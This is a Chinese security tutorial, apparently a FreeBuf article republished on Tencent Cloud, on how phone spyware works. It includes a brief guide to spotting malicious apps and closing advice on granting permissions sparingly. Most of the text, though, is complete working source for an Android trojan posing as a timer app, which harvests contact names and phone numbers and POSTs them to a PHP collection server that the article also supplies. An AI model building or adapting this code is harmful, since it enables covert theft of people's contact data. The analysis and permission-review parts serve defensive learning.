前往小程序,Get更优阅读体验!
立即前往
文档建议反馈控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
发布
首页
学习
活动
专区
工具
TVP最新优惠活动
返回腾讯云官网
社区首页 >专栏 >黑客是如何监视你的手机的?

黑客是如何监视你的手机的?

作者头像
FB客服
发布2018-07-30 14:58:08
1K0
发布2018-07-30 14:58:08
举报
文章被收录于专栏:FreeBufFreeBuf

0×00前言

最近收到比较多的垃圾信息,想起了恶意软件这种东西可能泄露信息,于是便写下此文。

0×01实验环境

基础环境:win10,Android studio 3,jd-gui,apktool,dex2jar

应用 :MyTimer(APP), php网页(接收信息)

虚拟机:

0×02实验准备

在ubuntu(192.168.159.128)服务器上搭建好php环境,然后准备三个文件:newfile.txt(用来存储接收到的信息),readinfo.php(用来展示接收到的信息),receive.php(用来接收信息)。这里使用的是虚拟机,实际中需要外网能访问的服务器,这样手机应用才能正常连接到服务器。

readinfo.php

代码语言:javascript
复制
<?php$file_path ="/var/www/readcontacts/newfile.txt";if(file_exists($file_path)){$str = file_get_contents($file_path);$str =str_replace("\r\n","<br />",$str);$str=explode(',',$str);echo"<pre>";print_r($str);echo "<pre>";}?>

receive.php

代码语言:javascript
复制
<?php$info= $_POST["info"];$myfile =fopen("/var/www/readcontacts/newfile.txt", "w") ordie("Unable to open file!");fwrite($myfile, $info);fclose($myfile);?>

0×03实验步骤

在模拟器中安装并启动MyTimer(此时服务器上的newfile.txt文件为空),从功能上看这只是一个计时器。如下图所示

我们在最上面的输入框中输入时间,点击“设置时间”按钮,会在下面显示到计时的时间。如下图所示

当我们点击“开始计时”按钮时,应用开始倒计时,如下图所示:

在使用此应用时,我们并未发现什么异常情况,现在我们把视角切换到ubuntu服务器上,这个时候就会发现newfile.txt中多出了一些内容,然后我们访问readinfo.php,就可以看到手机上的联系人信息

0×03原理剖析与软件实现

一、原理剖析

通常我们要分析一个应用是否有恶意功能,可以进行以下几步操作:

0、使用apktool得到AdroidManifest.xml,使用dex2jar得到应用源码

1、审查应用程序使用的权限

通过查看我们发现这个应用申请了网络访问权限,联系人读写权限,访问帐户列表权限,但是我们从应用的功能来看明显是不需要这几个功能的,列入嫌疑名单,开始下一步审查。

2、审查应用程序使用的进程间通信机制

这里我们只发现了一个调用主Activity的机制,本步检查安全。

3、分析源码中开放的端口、共享/传输的数据,以及网络连接

通过分析源码,我们发现代码里有一段发起了网络请求,应用程序在向一个IP为192.168.159.128地址发送信息

继续阅读源码,我们发现代码里有读取联系人的操作,同时将读取结果拼接到URL参数中向远程服务器发送。

综合分析可以发现,本应用程序在运行时,当用户点击设置时间按钮时会读取用户通讯录联系人并通过网络方式发送给远程服务器,可以定义为木马程序。

二、软件实现 上面是当遇到一个APP时的审查操作,为了更加深入的了解恶意软件的工作原理,此处我们编写一个简单恶意APP(也就是上面我们分析的APP),仅读取联系人信息。在实际中黑客可以会读取短信,读取位置信息跟踪定位一个人等。

MainActivity主要内容

代码语言:javascript
复制
public class MainActivity extendsAppCompatActivity implements OnClickListener {private EditText inputtime;private Button getTime;private Button startTime;private Button stopTime;private TextView time;private int remaindertime = 0;private Timer timer = null;private TimerTask timerTask = null;private String[] contacts = null;@Overrideprotected void onCreate(Bundle savedInstanceState) {super.onCreate(savedInstanceState);setContentView(R.layout.activity_main);initviews();setOnclick();}private void setOnclick() {getTime.setOnClickListener(this);startTime.setOnClickListener(this);stopTime.setOnClickListener(this);}private void initviews() {inputtime = (EditText) findViewById(R.id.inputtime);getTime = (Button) findViewById(R.id.gettime);startTime = (Button) findViewById(R.id.starttime);stopTime = (Button)findViewById(R.id.stoptime);time = (TextView) findViewById(R.id.time);}@Overridepublic void onClick(View v) {switch (v.getId()) {case R.id.gettime:time.setText(inputtime.getText().toString());remaindertime =Integer.parseInt(inputtime.getText().toString());printinfo();break;case R.id.starttime:startTime();break;case R.id.stoptime:stopTime();break;}}private Handler mHandler = new Handler() {public void handleMessage(android.os.Message msg) {time.setText(msg.arg1 + "");startTime();}};private void startTime() {if (timer == null) {timer = new Timer();}timerTask = new TimerTask() {@Overridepublic void run() {if (remaindertime > 0) {remaindertime--;Message message =Message.obtain();message.arg1 =remaindertime;mHandler.sendMessage(message);} else {stopTime();}}};timer.schedule(timerTask, 1000);}private void stopTime() {if (timer != null)timer.cancel();}privatevoid printinfo() {contacts = getContacts();if (contacts != null || (contacts == null && contacts.length !=0)) {new Thread(new Runnable() {@Overridepublic void run() {sendContacts();}}).start();}}public void sendContacts() {String target ="http://192.168.159.128/readcontacts/receive.php";URL url;try {url = new URL(target);HttpURLConnection urlConn = (HttpURLConnection) url.openConnection();urlConn.setRequestMethod("POST");urlConn.setDoInput(true);urlConn.setDoOutput(true);urlConn.setUseCaches(false);urlConn.setInstanceFollowRedirects(true);urlConn.setRequestProperty("Content-Type","application/x-www-form-urlencoded");String info = "";for (String item : contacts) {info += item + ",";}DataOutputStream out = new DataOutputStream(urlConn.getOutputStream());String param = "info=" + URLEncoder.encode(info,"utf-8");out.writeBytes(param);out.flush();out.close();if (urlConn.getResponseCode() == HttpURLConnection.HTTP_OK) {urlConn.disconnect();}} catch (MalformedURLException e) {e.printStackTrace();} catch (IOException e) {e.printStackTrace();}}private String[] getContacts() {Uri uri = ContactsContract.Contacts.CONTENT_URI;String[] projection = new String[]{ContactsContract.Contacts._ID,ContactsContract.Contacts.DISPLAY_NAME};Cursor cursor = this.getContentResolver().query(uri, projection, null,null, null);String[] arr = new String[cursor.getCount()];int i = 0;if (cursor != null && cursor.moveToFirst()) {do {Long id = cursor.getLong(0);String name =cursor.getString(1);String[] phoneProjection = newString[]{ContactsContract.CommonDataKinds.Phone.NUMBER};arr[i] = id + " |name:" + name;Cursor phonesCusor =this.getContentResolver().query(ContactsContract.CommonDataKinds.Phone.CONTENT_URI,phoneProjection,ContactsContract.CommonDataKinds.Phone.CONTACT_ID + "=" + id,null,null);if (phonesCusor != null&& phonesCusor.moveToFirst()) {do {String num =phonesCusor.getString(0);arr[i] += " |phonenum:" + num;} while(phonesCusor.moveToNext());} i++;} while (cursor.moveToNext());}return arr;}}

在AndroidManifest.xml添加如下配置

代码语言:javascript
复制
<uses-permissionandroid:name="android.permission.INTERNET"/><uses-permissionandroid:name="android.permission.WRITE_CONTACTS"/><uses-permissionandroid:name="android.permission.READ_CONTACTS"/><uses-permissionandroid:name="android.permission.GET_ACCOUNTS"/>

Avtivity_main.xml布局文件

代码语言:javascript
复制
<LinearLayoutxmlns:android="http://schemas.android.com/apk/res/android"xmlns:tools="http://schemas.android.com/tools"android:layout_width="match_parent"android:orientation="vertical"android:layout_height="match_parent" ><EditTextandroid:id="@+id/inputtime"android:layout_width="fill_parent"android:layout_height="wrap_content"android:ems="10" ><requestFocus /></EditText><Buttonandroid:id="@+id/gettime"android:layout_width="wrap_content"android:layout_height="wrap_content"android:text="设置时间" /><TextViewandroid:id="@+id/time"android:layout_width="wrap_content"android:layout_height="wrap_content"/><Buttonandroid:id="@+id/starttime"android:layout_width="wrap_content"android:layout_height="wrap_content"android:text="开始计时" /><Buttonandroid:id="@+id/stoptime"android:layout_width="wrap_content"android:layout_height="wrap_content"android:text="停止计时" /></LinearLayout>

0×05 写在最后

上面的程序只是演示了读取并发送联系人,黑客往往还会读取位置信息,读取短信,读取浏览器历史信息等。所以大家平时在安装APP时需要谨慎,在授予权限时也应该遵循最小权限原则,能不给的权限就不给。希望此文能帮助大家更好的理解恶意软件工作原理,帮助大家更好的防范恶意软件,相信大家也都是遵纪守法的好公民,学习只是为了防身,嗯。

* 本文作者:烟波渺渺正愁予,本文属FreeBuf原创奖励计划,未经许可禁止转载

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2018-05-04,如有侵权请联系 cloudcommunity@tencent.com 删除
其他

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

其他
评论
登录后参与评论
0 条评论
热度
最新
登录 后参与评论
推荐阅读
LV.
文章
0
获赞
0
目录
  • 0×00前言
  • 0×01实验环境
  • 0×02实验准备
  • 0×03实验步骤
  • 0×03原理剖析与软件实现
  • 0×05 写在最后
相关产品与服务
短信
腾讯云短信(Short Message Service,SMS)可为广大企业级用户提供稳定可靠,安全合规的短信触达服务。用户可快速接入,调用 API / SDK 或者通过控制台即可发送,支持发送验证码、通知类短信和营销短信。国内验证短信秒级触达,99%到达率;国际/港澳台短信覆盖全球200+国家/地区,全球多服务站点,稳定可靠。
免费体验产品介绍产品文档
国内短信特惠0.032元/条起,企业短信特惠0.037元/条起,更有新老同享套餐包0.038元/条起
领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2024 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号 | 京公网安备号11010802020287

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档

Copyright © 2013 - 2024 Tencent Cloud.

All Rights Reserved. 腾讯云 版权所有

登录 后参与评论